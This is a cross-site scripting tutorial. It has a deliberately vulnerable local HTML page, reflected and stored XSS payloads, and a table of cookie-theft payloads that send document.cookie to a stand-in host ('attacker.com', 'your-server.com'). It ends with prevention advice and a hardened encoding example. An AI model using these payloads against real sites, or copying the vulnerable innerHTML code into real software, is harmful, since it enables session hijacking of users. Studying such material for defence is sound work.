XSS
## Local POC Setup
Save the code below as `xss-poc.html` and open it in a browser. Set a test cookie via developer tools (Application > Cookies > add `session=abc123`). This simulates the /login error page and a stored comments section.[3]
```html
<!DOCTYPE html>
<html>
<head><title>XSS POC Demo</title></head>
<body>
  <h2>Reflected XSS (/login simulation)</h2>
  <form>
    <input id="error" placeholder="Enter param for reflection">
    <!-- type="button" keeps the click from submitting the form and reloading the page -->
    <button type="button" onclick="reflect()">Submit</button>
  </form>
  <div id="reflected"></div>

  <h2>Stored XSS (Comments)</h2>
  <input id="comment" placeholder="Enter comment">
  <button onclick="store()">Post Comment</button>
  <div id="comments"></div>

  <script>
    // Comments persist in localStorage to simulate server-side storage.
    let comments = JSON.parse(localStorage.getItem('comments')) || [];

    // Intentionally vulnerable: the input is written into innerHTML unencoded.
    function reflect() {
      const param = document.getElementById('error').value;
      document.getElementById('reflected').innerHTML = `Login error: ${param}`;
    }

    // Stores the raw comment with no validation or encoding.
    function store() {
      const input = document.getElementById('comment').value;
      comments.push(input);
      localStorage.setItem('comments', JSON.stringify(comments));
      displayComments();
    }

    // Intentionally vulnerable: every stored comment is rendered as HTML.
    function displayComments() {
      const div = document.getElementById('comments');
      div.innerHTML = comments.map(c => `<p>${c}</p>`).join('');
    }

    // Render stored comments on every page load.
    displayComments();
  </script>
</body>
</html>
```
## Test Reflected XSS
Enter `<img src=x onerror=alert('Reflected XSS')>` in the reflected input and submit. The payload executes immediately, simulating URL parameter injection on /login.[3][4]
## Test Stored XSS
Enter `<script>fetch('https://your-server.com/?c='+btoa(document.cookie))</script>` in comments and post. Refresh the page; the payload persists and "steals" cookies to your specified endpoint on every load.[1][2]
## Cookie Theft Payloads
Replace `https://your-server.com` with a listener like http://requestbin.com or ngrok for testing.
| Type | Payload Example |
|------|-----------------|
| Basic Alert | `<img src=x onerror=alert(document.cookie)>` [3] |
| Fetch Cookie | `<script>fetch('https://attacker.com/?c='+btoa(document.cookie))</script>` [2] |
| Image Beacon | `<img src="https://attacker.com/?c="+btoa(document.cookie)>` [10] |
## Prevention Tips
Encode outputs with HTML entities (e.g., `&lt;script&gt;`), use Content Security Policy, and sanitize inputs server-side. Test with tools like OWASP ZAP for your web dev projects.[5][6]
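
The output-encoding tip applied to the POC's two `innerHTML` sinks, as an added example that is not part of the original page. The function names, the `hasUnexpectedTag` regression check, and the policy string are assumptions made for illustration.

```javascript
// Added example, not the page's code: output encoding for the POC's two sinks.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Encode the five characters that can change HTML context.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, ch => HTML_ESCAPES[ch]);
}

// Hardened counterpart of reflect(): the parameter is encoded before it joins markup.
function renderLoginError(param) {
  return `Login error: ${escapeHtml(param)}`;
}

// Hardened counterpart of displayComments(): only the <p> wrapper is markup.
function renderComments(comments) {
  return comments.map(c => `<p>${escapeHtml(c)}</p>`).join('');
}

// The POC's original rendering, kept for comparison.
function renderCommentsUnsafe(comments) {
  return comments.map(c => `<p>${c}</p>`).join('');
}

// In a browser, skip string-built HTML entirely: textContent never parses markup.
function displayCommentsSafe(doc, container, comments) {
  const nodes = comments.map(c => {
    const p = doc.createElement('p');
    p.textContent = c;
    return p;
  });
  container.replaceChildren(...nodes);
}

// Regression check: true if any tag other than <p> or </p> survives in the output.
function hasUnexpectedTag(html) {
  return /<(?!\/?p>)/.test(html);
}

// Example policy (assumption: all scripts are served from the page's own origin).
// script-src 'self' blocks inline <script> and inline event handlers;
// connect-src and img-src limit where fetch() and image requests may go.
const CSP = "default-src 'self'; script-src 'self'; connect-src 'self'; img-src 'self'; object-src 'none'; base-uri 'none'";

// Constructed sample input: the two payloads from the test sections above.
const samples = ["<img src=x onerror=alert('Reflected XSS')>",
  "<script>fetch('https://your-server.com/?c='+btoa(document.cookie))</script>"];
console.log(renderComments(samples), hasUnexpectedTag(renderComments(samples)));
```

Under this policy the POC's own inline `<script>` block and `onclick` attributes would also be blocked, so the page logic has to move to a same-origin `.js` file with handlers attached via `addEventListener`.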
Citations:
[1] Lab: Exploiting cross-site scripting to steal cookies https://portswigger.net/web-security/cross-site-scripting/exploiting/lab-stealing-cookies
[2] How can stored XSS vulnerability lead to cookie stealing? https://www.linkedin.com/pulse/how-can-stored-xss-vulnerability-lead-cookie-stealing-motasem-hamdan-fo4vf
[3] reflected XSS - Cross-site scripting https://portswigger.net/web-security/cross-site-scripting/reflected
[4] Testing for Reflective XSS https://www.cobalt.io/blog/testing-for-reflective-xss
[5] Cross-site scripting (XSS) - Security | MDN https://developer.mozilla.org/en-US/docs/Web/Security/Attacks/XSS
[6] Trusted Types Demo - Modern XSS Prevention for Web Security https://www.trustedtypesdemo.com
[8] Stored XSS and stealing session cookies https://www.hakatemia.fi/en/courses/xss-cross-site-scripting/stored-xss-injection-and-stealing-cookies
[9] Cross Site Scripting (XSS) Exploit Paths - DevCentral - F5 https://community.f5.com/kb/technicalarticles/cross-site-scripting-xss-exploit-paths/275166
[10] How Can Stored XSS Vulnerability Lead to Cookie Stealing? Practical Training Scenario https://www.youtube.com/watch?v=G1HXWcKz7_E
[11] Reflected XSS via ref parameter on login https://www.bugbountyhunter.com/hackevents/report?id=267
[12] Cookie Stealing with XSS https://jamesonhacking.blogspot.com/2018/08/cookie-stealing-with-xss.html
[13] XSS Demo https://xss.benstafford.dev
[14] Cookie Hijacking https://www.invicti.com/learn/cookie-hijacking
[15] Cross Site Scripting (XSS) https://owasp.org/www-community/attacks/xss/
[16] practical XSS attack scenarios... https://pentest-tools.com/blog/xss-attacks-practical-scenarios
[17] Sanitizing Inputs https://brightsec.com/blog/reflected-xss/




